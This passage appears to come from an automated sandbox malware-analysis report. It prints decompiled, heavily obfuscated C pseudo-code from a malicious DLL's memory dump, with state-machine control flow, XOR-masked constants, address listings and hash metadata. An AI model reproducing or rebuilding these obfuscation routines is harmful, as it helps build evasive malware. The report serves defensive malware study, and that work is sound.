				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _t404;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t430;
				void* _t463;
				void* _t464;
				signed int* _t468;

				_t468 =  &_v2776;
				_v2716 = 0x9827f0;
				_v2716 = _v2716 << 9;
				_v2716 = _v2716 >> 4;
				_v2716 = _v2716 ^ 0x0304fe29;
				_v2684 = 0x251356;
				_v2684 = _v2684 + 0x1e2;
				_v2684 = _v2684 | 0xda75bfb2;
				_v2684 = _v2684 ^ 0xda7428eb;
				_v2768 = 0x24e368;
				_v2768 = _v2768 ^ 0xd5a17b15;
				_v2768 = _v2768 << 7;
				_v2768 = _v2768 | 0xced33043;
				_v2768 = _v2768 ^ 0xced6ff80;
				_v2736 = 0xa2f196;
				_v2736 = _v2736 + 0x6d02;
				_v2736 = _v2736 << 8;
				_v2736 = _v2736 * 0x63;
				_t463 = __ecx;
				_v2736 = _v2736 ^ 0x2d971c6c;
				_t464 = 0x422d362;
				_v2760 = 0x391c44;
				_v2760 = _v2760 >> 0x10;
				_v2760 = _v2760 + 0xe88b;
				_v2760 = _v2760 + 0x506d;
				_v2760 = _v2760 ^ 0x00052d5d;
				_v2744 = 0x960a81;
				_t421 = 3;
				_v2744 = _v2744 * 0x47;
				_v2744 = _v2744 * 0x66;
				_v2744 = _v2744 + 0x35e4;
				_v2744 = _v2744 ^ 0x94845397;
				_v2604 = 0xe8b0f5;
				_v2604 = _v2604 + 0x9847;
				_v2604 = _v2604 ^ 0x00e1425b;
				_v2712 = 0x9aefe1;
				_v2712 = _v2712 + 0x2d7a;
				_v2712 = _v2712 | 0x79d44310;
				_v2712 = _v2712 ^ 0x79db8805;
				_v2728 = 0x1377c5;
				_v2728 = _v2728 | 0x6e97ff53;
				_v2728 = _v2728 + 0x22de;
				_v2728 = _v2728 ^ 0x6e9b6172;
				_v2752 = 0xb1335e;
				_v2752 = _v2752 ^ 0x2dbaf336;
				_v2752 = _v2752 / _t421;
				_v2752 = _v2752 ^ 0xfe92c193;
				_v2752 = _v2752 ^ 0xf19577cc;
				_v2660 = 0x2952e4;
				_v2660 = _v2660 | 0x79708fb3;
				_v2660 = _v2660 ^ 0x797ec65d;
				_v2680 = 0x48d1a6;
				_t422 = 0x34;
				_v2680 = _v2680 / _t422;
				_v2680 = _v2680 * 0x69;
				_v2680 = _v2680 ^ 0x0099bc36;
				_v2612 = 0xcdd72a;
				_v2612 = _v2612 * 0x50;
				_v2612 = _v2612 ^ 0x4054338c;
				_v2672 = 0x8e3222;
				_v2672 = _v2672 << 1;
				_v2672 = _v2672 ^ 0x0115b014;
				_v2772 = 0xea36ba;
				_v2772 = _v2772 + 0xffff2869;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0xcd7b9291;
				_v2772 = _v2772 ^ 0xcd4b3afc;
				_v2776 = 0x8f99fe;
				_v2776 = _v2776 + 0x5190;
				_v2776 = _v2776 + 0xffffc7d6;
				_v2776 = _v2776 ^ 0x0f761f96;
				_v2776 = _v2776 ^ 0x0ff50908;
				_v2652 = 0xb833cd;
				_t423 = 0x31;
				_v2652 = _v2652 * 0x75;
				_v2652 = _v2652 ^ 0x5422af3f;
				_v2620 = 0x8c6cc6;
				_v2620 = _v2620 + 0xffff9da6;
				_v2620 = _v2620 ^ 0x008df9f5;
				_v2688 = 0x40b504;
				_v2688 = _v2688 ^ 0xc3e337a5;
				_v2688 = _v2688 + 0x808c;
				_v2688 = _v2688 ^ 0xc3a77743;
				_v2704 = 0x4030d0;
				_v2704 = _v2704 | 0xd8d5f091;
				_v2704 = _v2704 ^ 0xb4a4ac2b;
				_v2704 = _v2704 ^ 0x6c7bdbfc;
				_v2644 = 0xafd4ef;
				_v2644 = _v2644 * 0x3b;
				_v2644 = _v2644 ^ 0x288fb790;
				_v2764 = 0x1d91e2;
				_v2764 = _v2764 | 0xd96eda72;
				_v2764 = _v2764 + 0xffffbbe3;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000d90f8;
				_v2696 = 0x4b7a41;
				_v2696 = _v2696 | 0xbfeeeeed;
				_v2696 = _v2696 ^ 0xbfe32e95;
				_v2708 = 0x8f6339;
				_v2708 = _v2708 | 0xa71a0417;
				_v2708 = _v2708 + 0xffff51d8;
				_v2708 = _v2708 ^ 0xa79b9aa8;
				_v2636 = 0x12e7d6;
				_v2636 = _v2636 * 0x21;
				_v2636 = _v2636 ^ 0x026e6de9;
				_v2756 = 0xd5c5d;
				_v2756 = _v2756 ^ 0x716456fc;
				_v2756 = _v2756 + 0xa334;
				_v2756 = _v2756 >> 0xc;
				_v2756 = _v2756 ^ 0x000918e1;
				_v2608 = 0xbb78a7;
				_v2608 = _v2608 + 0xd6b3;
				_v2608 = _v2608 ^ 0x00b2dabe;
				_v2668 = 0xad3636;
				_v2668 = _v2668 + 0xffffa01e;
				_v2668 = _v2668 ^ 0x00a02f3e;
				_v2628 = 0x4494fc;
				_v2628 = _v2628 / _t423;
				_v2628 = _v2628 ^ 0x0009fca5;
				_v2748 = 0x660e04;
				_v2748 = _v2748 + 0xffffa723;
				_v2748 = _v2748 | 0x67469fe4;
				_t424 = 0x4b;
				_v2748 = _v2748 * 5;
				_v2748 = _v2748 ^ 0x050bc0b3;
				_v2616 = 0xd4c89d;
				_v2616 = _v2616 << 7;
				_v2616 = _v2616 ^ 0x6a6fac0f;
				_v2700 = 0xaa08c8;
				_v2700 = _v2700 + 0xffffd108;
				_v2700 = _v2700 / _t424;
				_v2700 = _v2700 ^ 0x0001fda8;
				_v2732 = 0x67cb1c;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 | 0x2b3c2ffa;
				_v2732 = _v2732 ^ 0x295e7aa1;
				_v2732 = _v2732 ^ 0x06a01d44;
				_v2656 = 0xfaf065;
				_v2656 = _v2656 + 0xffff35fd;
				_v2656 = _v2656 ^ 0x00f58676;
				_v2740 = 0x2bd94;
				_v2740 = _v2740 + 0x3f47;
				_t425 = 0x2a;
				_v2740 = _v2740 / _t425;
				_v2740 = _v2740 ^ 0xca3749d7;
				_v2740 = _v2740 ^ 0xca3fc9be;
				_v2664 = 0x3942c4;
				_v2664 = _v2664 << 0xe;
				_v2664 = _v2664 ^ 0x50bf8d15;
				_v2724 = 0xb2ae33;
				_t426 = 0x22;
				_v2724 = _v2724 / _t426;
				_v2724 = _v2724 << 1;
				_v2724 = _v2724 ^ 0x6c628229;
				_v2724 = _v2724 ^ 0x6c6ae222;
				_v2640 = 0xd32362;
				_v2640 = _v2640 + 0xffff88f4;
				_v2640 = _v2640 ^ 0x00d4f71b;
				_v2648 = 0x3e5b4d;
				_v2648 = _v2648 + 0x4f8c;
				_v2648 = _v2648 ^ 0x003b681e;
				_v2676 = 0xc6bb8b;
				_v2676 = _v2676 << 4;
				_t427 = 0x14;
				_v2676 = _v2676 / _t427;
				_v2676 = _v2676 ^ 0x009ad4f5;
				_v2720 = 0xa3b34d;
				_v2720 = _v2720 + 0xffff97dd;
				_v2720 = _v2720 | 0x7136ebef;
				_v2720 = _v2720 ^ 0x71b8bb4e;
				_v2692 = 0xa7ff58;
				_t404 = _v2692 * 0x31;
				_v2692 = _t404;
				_v2692 = _v2692 >> 4;
				_v2692 = _v2692 ^ 0x020bdfc2;
				_v2624 = 0xa501ce;
				_v2624 = _v2624 | 0xdc20330f;
				_v2624 = _v2624 ^ 0xdca3e6f8;
				_v2632 = 0xa992b7;
				_v2632 = _v2632 | 0x4e4d69fe;
				_v2632 = _v2632 ^ 0x4ee71179;
				while(_t464 != 0x2953b22) {
					if(_t464 == 0x422d362) {
						_t464 = 0xe704baa;
						continue;
					} else {
						_t475 = _t464 - 0xe704baa;
						if(_t464 != 0xe704baa) {
							L8:
							__eflags = _t464 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E001912A8(_t427, _v2684, _t475, _v2768, _v2736,  &_v2600);
							 *((short*)(E00184FA8(_v2760,  &_v2600, _v2744, _v2604))) = 0;
							E00178650(_v2712,  &_v1560, _t475, _v2728);
							_push(_v2612);
							_push(_v2680);
							_push(0x17181c);
							E0017E7CE(E0017AB66(_v2752, _v2660, _t475), _t475, _v2672,  &_v2600, _v2752, _v2772, _v2776, _v2652, _v2620,  &_v1560);
							E0017AE03(_v2688, _v2704, _v2644, _t415);
							_t427 = _v2764;
							_t404 = E0018C38F(_t427,  &_v2080, _t463, _v2696);
							_t468 =  &(_t468[0x15]);
							if(_t404 != 0) {
								_t464 = 0x2953b22;
								continue;
							}
						}
					}
					return _t404;
				}
				_push(_t427);
				E0017EA7B( &_v1040, _v2708, _v2716, _t427, _v2636, _v2756, _v2608);
				_push(_v2616);
				_push(_v2748);
				_push(0x1718cc);
				E0017E7CE(E0017AB66(_v2668, _v2628, __eflags), __eflags, _v2700,  &_v1040, _v2668, _v2732, _v2656, _v2740, _v2664,  &_v2080);
				_t430 = _v2724;
				E0017AE03(_t430, _v2640, _v2648, _t406);
				_push(_v2632);
				_push(_v2624);
				_push(_v2692);
				_push(0);
				_push(0);
				_push(_v2720);
				_push(_t430);
				_push(0);
				_t427 =  &_v520;
				_t404 = E00179700(_t427, _v2676, __eflags);
				_t468 =  &(_t468[0x1c]);
				_t464 = 0x740d40c;
				goto L8;
			}
































































                                                                                                                      0x00177b82
                                                                                                                      0x00177b88
                                                                                                                      0x00177b92
                                                                                                                      0x00177b97
                                                                                                                      0x00177b9c
                                                                                                                      0x00177ba4
                                                                                                                      0x00177bac
                                                                                                                      0x00177bb4
                                                                                                                      0x00177bbc
                                                                                                                      0x00177bc4
                                                                                                                      0x00177bcc
                                                                                                                      0x00177bd4
                                                                                                                      0x00177bd9
                                                                                                                      0x00177be1
                                                                                                                      0x00177be9
                                                                                                                      0x00177bf1
                                                                                                                      0x00177bf9
                                                                                                                      0x00177c08
                                                                                                                      0x00177c0c
                                                                                                                      0x00177c0e
                                                                                                                      0x00177c16
                                                                                                                      0x00177c1b
                                                                                                                      0x00177c23
                                                                                                                      0x00177c28
                                                                                                                      0x00177c30
                                                                                                                      0x00177c38
                                                                                                                      0x00177c40
                                                                                                                      0x00177c4d
                                                                                                                      0x00177c50
                                                                                                                      0x00177c59
                                                                                                                      0x00177c5d
                                                                                                                      0x00177c65
                                                                                                                      0x00177c6d
                                                                                                                      0x00177c78
                                                                                                                      0x00177c83
                                                                                                                      0x00177c8e
                                                                                                                      0x00177c96
                                                                                                                      0x00177c9e
                                                                                                                      0x00177ca6
                                                                                                                      0x00177cae
                                                                                                                      0x00177cb6
                                                                                                                      0x00177cbe
                                                                                                                      0x00177cc6
                                                                                                                      0x00177cce
                                                                                                                      0x00177cd6
                                                                                                                      0x00177ce6
                                                                                                                      0x00177cea
                                                                                                                      0x00177cf2
                                                                                                                      0x00177cfa
                                                                                                                      0x00177d05
                                                                                                                      0x00177d10
                                                                                                                      0x00177d1b
                                                                                                                      0x00177d27
                                                                                                                      0x00177d2a
                                                                                                                      0x00177d33
                                                                                                                      0x00177d37
                                                                                                                      0x00177d3f
                                                                                                                      0x00177d52
                                                                                                                      0x00177d59
                                                                                                                      0x00177d64
                                                                                                                      0x00177d6c
                                                                                                                      0x00177d70
                                                                                                                      0x00177d78
                                                                                                                      0x00177d80
                                                                                                                      0x00177d88
                                                                                                                      0x00177d8d
                                                                                                                      0x00177d95
                                                                                                                      0x00177d9f
                                                                                                                      0x00177da7
                                                                                                                      0x00177daf
                                                                                                                      0x00177db7
                                                                                                                      0x00177dbf
                                                                                                                      0x00177dc7
                                                                                                                      0x00177ddc
                                                                                                                      0x00177ddf
                                                                                                                      0x00177de6
                                                                                                                      0x00177df1
                                                                                                                      0x00177dfc
                                                                                                                      0x00177e07
                                                                                                                      0x00177e12
                                                                                                                      0x00177e1a
                                                                                                                      0x00177e22
                                                                                                                      0x00177e2a
                                                                                                                      0x00177e32
                                                                                                                      0x00177e3a
                                                                                                                      0x00177e42
                                                                                                                      0x00177e4a
                                                                                                                      0x00177e52
                                                                                                                      0x00177e65
                                                                                                                      0x00177e6c
                                                                                                                      0x00177e77
                                                                                                                      0x00177e7f
                                                                                                                      0x00177e87
                                                                                                                      0x00177e8f
                                                                                                                      0x00177e94
                                                                                                                      0x00177e9c
                                                                                                                      0x00177ea4
                                                                                                                      0x00177eac
                                                                                                                      0x00177eb4
                                                                                                                      0x00177ebc
                                                                                                                      0x00177ec4
                                                                                                                      0x00177ecc
                                                                                                                      0x00177ed4
                                                                                                                      0x00177ee7
                                                                                                                      0x00177eee
                                                                                                                      0x00177ef9
                                                                                                                      0x00177f01
                                                                                                                      0x00177f09
                                                                                                                      0x00177f11
                                                                                                                      0x00177f16
                                                                                                                      0x00177f1e
                                                                                                                      0x00177f29
                                                                                                                      0x00177f34
                                                                                                                      0x00177f3f
                                                                                                                      0x00177f47
                                                                                                                      0x00177f4f
                                                                                                                      0x00177f57
                                                                                                                      0x00177f6d
                                                                                                                      0x00177f74
                                                                                                                      0x00177f7f
                                                                                                                      0x00177f87
                                                                                                                      0x00177f8f
                                                                                                                      0x00177f9c
                                                                                                                      0x00177f9d
                                                                                                                      0x00177fa1
                                                                                                                      0x00177fa9
                                                                                                                      0x00177fb4
                                                                                                                      0x00177fbc
                                                                                                                      0x00177fc7
                                                                                                                      0x00177fcf
                                                                                                                      0x00177fdd
                                                                                                                      0x00177fe1
                                                                                                                      0x00177fe9
                                                                                                                      0x00177ff1
                                                                                                                      0x00177ff6
                                                                                                                      0x00177ffe
                                                                                                                      0x00178008
                                                                                                                      0x00178015
                                                                                                                      0x00178020
                                                                                                                      0x0017802b
                                                                                                                      0x00178036
                                                                                                                      0x0017803e
                                                                                                                      0x0017804c
                                                                                                                      0x00178051
                                                                                                                      0x00178057
                                                                                                                      0x0017805f
                                                                                                                      0x00178067
                                                                                                                      0x00178072
                                                                                                                      0x0017807a
                                                                                                                      0x00178085
                                                                                                                      0x00178091
                                                                                                                      0x00178096
                                                                                                                      0x0017809c
                                                                                                                      0x001780a0
                                                                                                                      0x001780a8
                                                                                                                      0x001780b0
                                                                                                                      0x001780bb
                                                                                                                      0x001780c6
                                                                                                                      0x001780d1
                                                                                                                      0x001780dc
                                                                                                                      0x001780e7
                                                                                                                      0x001780f2
                                                                                                                      0x001780fa
                                                                                                                      0x00178103
                                                                                                                      0x00178106
                                                                                                                      0x0017810a
                                                                                                                      0x00178112
                                                                                                                      0x0017811a
                                                                                                                      0x00178122
                                                                                                                      0x0017812a
                                                                                                                      0x00178132
                                                                                                                      0x0017813a
                                                                                                                      0x0017813f
                                                                                                                      0x00178143
                                                                                                                      0x00178148
                                                                                                                      0x00178150
                                                                                                                      0x0017815b
                                                                                                                      0x00178166
                                                                                                                      0x00178171
                                                                                                                      0x0017817c
                                                                                                                      0x00178187
                                                                                                                      0x00178192
                                                                                                                      0x001781a0
                                                                                                                      0x001782a5
                                                                                                                      0x00000000
                                                                                                                      0x001781a6
                                                                                                                      0x001781a6
                                                                                                                      0x001781ac
                                                                                                                      0x0017838b
                                                                                                                      0x0017838b
                                                                                                                      0x00178391
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001781b2
                                                                                                                      0x001781c6
                                                                                                                      0x001781f3
                                                                                                                      0x001781fa
                                                                                                                      0x001781ff
                                                                                                                      0x00178206
                                                                                                                      0x00178218
                                                                                                                      0x0017825e
                                                                                                                      0x00178276
                                                                                                                      0x00178282
                                                                                                                      0x0017828e
                                                                                                                      0x00178293
                                                                                                                      0x00178298
                                                                                                                      0x0017829e
                                                                                                                      0x00000000
                                                                                                                      0x0017829e
                                                                                                                      0x00178298
                                                                                                                      0x001781ac
                                                                                                                      0x001783a0
                                                                                                                      0x001783a0
                                                                                                                      0x001782af
                                                                                                                      0x001782d2
                                                                                                                      0x001782d7
                                                                                                                      0x001782de
                                                                                                                      0x001782f0
                                                                                                                      0x00178333
                                                                                                                      0x00178347
                                                                                                                      0x0017834b
                                                                                                                      0x00178353
                                                                                                                      0x0017835a
                                                                                                                      0x00178361
                                                                                                                      0x00178365
                                                                                                                      0x00178367
                                                                                                                      0x00178369
                                                                                                                      0x00178374
                                                                                                                      0x00178375
                                                                                                                      0x00178377
                                                                                                                      0x0017837e
                                                                                                                      0x00178383
                                                                                                                      0x00178386
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AzK$G?$M[>$[B$]\$h$$mP$z-$R)$6q
                                                                                                                      • API String ID: 0-2334141070
                                                                                                                      • Opcode ID: bb38440e5dd0fb3af389ec01d410a3628ed05da2c69ea6f11f677433c680b813
                                                                                                                      • Instruction ID: b9d854ac7f37410e87e7a797c91806c8bd97c414a649f1b712587d794db631da
                                                                                                                      • Opcode Fuzzy Hash: bb38440e5dd0fb3af389ec01d410a3628ed05da2c69ea6f11f677433c680b813
                                                                                                                      • Instruction Fuzzy Hash: EC120F71508381DFD3A8CF21C58AA8BBBF1BBC5758F108A1DE2D996260D7B18949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001874DD Relevance: 12.8, Strings: 10, Instructions: 335COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E001874DD() {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				unsigned int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				void* _t373;
				signed int* _t377;
				signed int _t381;
				signed int _t383;
				signed int* _t384;
				void* _t385;
				intOrPtr _t396;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t409;
				signed int* _t410;
				signed int* _t444;
				void* _t452;
				signed int* _t456;

				_t456 =  &_v152;
				_v8 = 0x511491;
				_t396 = 0;
				_t452 = 0x68b0bf3;
				_v4 = 0;
				_v108 = 0xf5425d;
				_t398 = 0x24;
				_v108 = _v108 / _t398;
				_v108 = _v108 | 0xbb3a7fab;
				_v108 = _v108 ^ 0xbb3effbb;
				_v132 = 0xf54152;
				_v132 = _v132 + 0x73b9;
				_v132 = _v132 | 0x673a86bd;
				_v132 = _v132 >> 4;
				_v132 = _v132 ^ 0x067ffb7b;
				_v36 = 0x17d741;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0xf5d04000;
				_v72 = 0xb99ed8;
				_t399 = 0x74;
				_v72 = _v72 * 0x57;
				_v72 = _v72 ^ 0x28cb8c28;
				_v72 = _v72 ^ 0x17df7740;
				_v100 = 0xb82182;
				_v100 = _v100 >> 2;
				_v100 = _v100 | 0xc07135d2;
				_v100 = _v100 ^ 0xc07f3df2;
				_v120 = 0x71fefc;
				_v120 = _v120 ^ 0x3c3b57cf;
				_v120 = _v120 ^ 0xde073c70;
				_v120 = _v120 + 0xffffefcb;
				_v120 = _v120 ^ 0xe24618f4;
				_v128 = 0x9b3c32;
				_v128 = _v128 >> 0xb;
				_v128 = _v128 ^ 0x48395a77;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0x000e9da5;
				_v136 = 0x52cc3f;
				_v136 = _v136 * 0x6b;
				_v136 = _v136 ^ 0x9c4f2321;
				_v136 = _v136 | 0xfd912896;
				_v136 = _v136 ^ 0xffd2684a;
				_v48 = 0x5298d7;
				_v48 = _v48 ^ 0x46ea6646;
				_v48 = _v48 ^ 0x46b0922b;
				_v112 = 0xeb4fde;
				_v112 = _v112 / _t399;
				_v112 = _v112 >> 0xc;
				_t400 = 0x56;
				_v112 = _v112 / _t400;
				_v112 = _v112 ^ 0x0003a7ac;
				_v52 = 0x2cac0;
				_v52 = _v52 + 0x2e2d;
				_v52 = _v52 ^ 0x00080243;
				_v124 = 0x3dbea4;
				_v124 = _v124 + 0x560a;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 >> 9;
				_v124 = _v124 ^ 0x00027af4;
				_v56 = 0x4e9164;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x00077014;
				_v28 = 0x1ac9f;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x00d40977;
				_v148 = 0xc87974;
				_t401 = 0xf;
				_v148 = _v148 / _t401;
				_v148 = _v148 + 0x3bc4;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x0004ff8e;
				_v140 = 0x51bf99;
				_v140 = _v140 + 0x1f0d;
				_v140 = _v140 | 0x6ce4c515;
				_v140 = _v140 << 7;
				_v140 = _v140 ^ 0x7aef3c21;
				_v64 = 0x9041a6;
				_v64 = _v64 | 0xf9fd38a0;
				_v64 = _v64 + 0x56fc;
				_v64 = _v64 ^ 0xf9f31663;
				_v96 = 0xb1a19;
				_v96 = _v96 + 0x5234;
				_t402 = 0x68;
				_v96 = _v96 * 0x32;
				_v96 = _v96 ^ 0x0237c494;
				_v152 = 0x354a37;
				_v152 = _v152 | 0x37184972;
				_v152 = _v152 ^ 0x144b30cb;
				_v152 = _v152 * 0x1f;
				_v152 = _v152 ^ 0x4b54d1c6;
				_v116 = 0xf3726e;
				_v116 = _v116 + 0xcc69;
				_v116 = _v116 >> 3;
				_v116 = _v116 + 0x674b;
				_v116 = _v116 ^ 0x001624aa;
				_v44 = 0x3b88ac;
				_v44 = _v44 / _t402;
				_v44 = _v44 ^ 0x00096110;
				_v20 = 0x83fd7f;
				_v20 = _v20 ^ 0x5c57be60;
				_v20 = _v20 ^ 0x5cd84720;
				_v144 = 0x80ab55;
				_t403 = 0x46;
				_v144 = _v144 / _t403;
				_v144 = _v144 + 0xffffcaef;
				_v144 = _v144 + 0xffff67c3;
				_v144 = _v144 ^ 0x00052ea0;
				_v16 = 0xeb356a;
				_t199 =  &_v16; // 0xeb356a
				_t404 = 0x65;
				_v16 =  *_t199 / _t404;
				_v16 = _v16 ^ 0x000ce393;
				_v88 = 0xe75d2;
				_v88 = _v88 + 0xe1a2;
				_v88 = _v88 ^ 0xbfa107b7;
				_v88 = _v88 ^ 0xbfa92cf6;
				_v40 = 0xb57020;
				_t405 = 0x18;
				_v40 = _v40 / _t405;
				_v40 = _v40 ^ 0x000d9612;
				_v80 = 0xaa39d6;
				_t406 = 0x4c;
				_v80 = _v80 / _t406;
				_t407 = 0x4f;
				_v80 = _v80 / _t407;
				_v80 = _v80 ^ 0x000dd886;
				_v84 = 0x7565b2;
				_v84 = _v84 ^ 0x85e60cd2;
				_v84 = _v84 | 0xe2f126fa;
				_v84 = _v84 ^ 0xe7fbef1f;
				_v92 = 0x20921c;
				_v92 = _v92 << 0xf;
				_t408 = 0x3d;
				_v92 = _v92 / _t408;
				_v92 = _v92 ^ 0x0137fd8d;
				_v104 = 0x7d1988;
				_v104 = _v104 | 0x48f8c783;
				_v104 = _v104 * 0x2a;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0x0f9ace16;
				_v32 = 0xc6b5a4;
				_v32 = _v32 ^ 0x611852a0;
				_v32 = _v32 ^ 0x61d9018e;
				_v24 = 0x4e0063;
				_v24 = _v24 * 0x56;
				_v24 = _v24 ^ 0x1a371aa3;
				_v60 = 0xb39a6a;
				_v60 = _v60 + 0x379a;
				_v60 = _v60 << 0xb;
				_v60 = _v60 ^ 0x9e9cdd6f;
				_v68 = 0xe7ba26;
				_v68 = _v68 + 0xffffbb05;
				_v68 = _v68 ^ 0xbd703087;
				_v68 = _v68 ^ 0xbd98ca1c;
				_v76 = 0x8102f3;
				_v76 = _v76 << 6;
				_v76 = _v76 * 0x7c;
				_v76 = _v76 ^ 0x9f574684;
				while(1) {
					L1:
					_t444 =  *0x195c90; // 0x0
					_t373 = 0x882fd94;
					do {
						if(_t452 == 0x68b0bf3) {
							_push(_t408);
							_push(_t408);
							_t409 = 0x28;
							_t377 = E00183512(_t409);
							 *0x195c90 = _t377;
							_t377[3] = 0x4000;
							_t410 =  *0x195c90; // 0x0
							_t381 = E00183512(_t410[3]);
							_t444 =  *0x195c90; // 0x0
							_t452 = 0xf7a4d1a;
							_t408 = _t381;
							_t383 = _t444[3] + _t408;
							__eflags = _t383;
							_t444[2] = _t408;
							_t444[1] = _t408;
							 *_t444 = _t408;
							_t444[5] = _t383;
							L12:
							_t373 = 0x882fd94;
							goto L13;
						}
						if(_t452 == _t373) {
							_t384 =  *0x195c90; // 0x0
							_t408 = _v20;
							_t385 = E0017C795(_t408, _v144, _v36, _t384[3], _t384[2], _v12, _v16, _v88);
							_t456 =  &(_t456[6]);
							__eflags = _t385 - _v72;
							if(__eflags != 0) {
								_t452 = 0xcb14d1c;
							} else {
								_t452 = 0xd2040d1;
								_t396 = 1;
							}
							goto L1;
						}
						if(_t452 == 0xcb14d1c) {
							E001768DE(_v84, _v92, _v104, _v32, _t444[2]);
							E001768DE(_v24, _v60, _v68, _v76,  *0x195c90);
							L17:
							return _t396;
						}
						if(_t452 == 0xd2040d1) {
							E00177027(_v40, _v100, _v12, _v80);
							goto L17;
						}
						_t463 = _t452 - 0xf7a4d1a;
						if(_t452 != 0xf7a4d1a) {
							goto L13;
						}
						_push(_v148);
						_push(_v28);
						_push(0x171324);
						E00180EDA(0, _v108, _v140, E0017AB66(_v124, _v56, _t463),  &_v12, _v64, _v96);
						_t408 = _v152;
						_t452 =  ==  ? 0x882fd94 : 0xcb14d1c;
						E0017AE03(_t408, _v116, _v44, _t390);
						_t444 =  *0x195c90; // 0x0
						_t456 =  &(_t456[0xa]);
						goto L12;
						L13:
					} while (_t452 != 0xd072e76);
					goto L17;
				}
			}
































































                                                                                                                      0x001874dd
                                                                                                                      0x001874e3
                                                                                                                      0x001874f4
                                                                                                                      0x001874f6
                                                                                                                      0x001874fb
                                                                                                                      0x00187502
                                                                                                                      0x00187518
                                                                                                                      0x0018751d
                                                                                                                      0x00187523
                                                                                                                      0x0018752b
                                                                                                                      0x00187533
                                                                                                                      0x0018753b
                                                                                                                      0x00187543
                                                                                                                      0x0018754b
                                                                                                                      0x00187550
                                                                                                                      0x00187558
                                                                                                                      0x00187563
                                                                                                                      0x0018756b
                                                                                                                      0x00187576
                                                                                                                      0x00187583
                                                                                                                      0x00187586
                                                                                                                      0x0018758a
                                                                                                                      0x00187592
                                                                                                                      0x0018759a
                                                                                                                      0x001875a2
                                                                                                                      0x001875a7
                                                                                                                      0x001875af
                                                                                                                      0x001875b7
                                                                                                                      0x001875bf
                                                                                                                      0x001875c7
                                                                                                                      0x001875cf
                                                                                                                      0x001875d7
                                                                                                                      0x001875df
                                                                                                                      0x001875e7
                                                                                                                      0x001875ec
                                                                                                                      0x001875f4
                                                                                                                      0x001875f9
                                                                                                                      0x00187601
                                                                                                                      0x0018760e
                                                                                                                      0x00187612
                                                                                                                      0x0018761a
                                                                                                                      0x00187622
                                                                                                                      0x0018762a
                                                                                                                      0x00187632
                                                                                                                      0x0018763a
                                                                                                                      0x00187642
                                                                                                                      0x00187652
                                                                                                                      0x00187656
                                                                                                                      0x0018765f
                                                                                                                      0x00187662
                                                                                                                      0x00187666
                                                                                                                      0x0018766e
                                                                                                                      0x00187676
                                                                                                                      0x0018767e
                                                                                                                      0x00187686
                                                                                                                      0x0018768e
                                                                                                                      0x00187696
                                                                                                                      0x0018769b
                                                                                                                      0x001876a0
                                                                                                                      0x001876a8
                                                                                                                      0x001876b0
                                                                                                                      0x001876b5
                                                                                                                      0x001876bd
                                                                                                                      0x001876ca
                                                                                                                      0x001876d2
                                                                                                                      0x001876dd
                                                                                                                      0x001876eb
                                                                                                                      0x001876f0
                                                                                                                      0x001876f6
                                                                                                                      0x001876fe
                                                                                                                      0x00187703
                                                                                                                      0x0018770b
                                                                                                                      0x00187713
                                                                                                                      0x0018771b
                                                                                                                      0x00187723
                                                                                                                      0x00187728
                                                                                                                      0x00187730
                                                                                                                      0x00187738
                                                                                                                      0x00187740
                                                                                                                      0x00187748
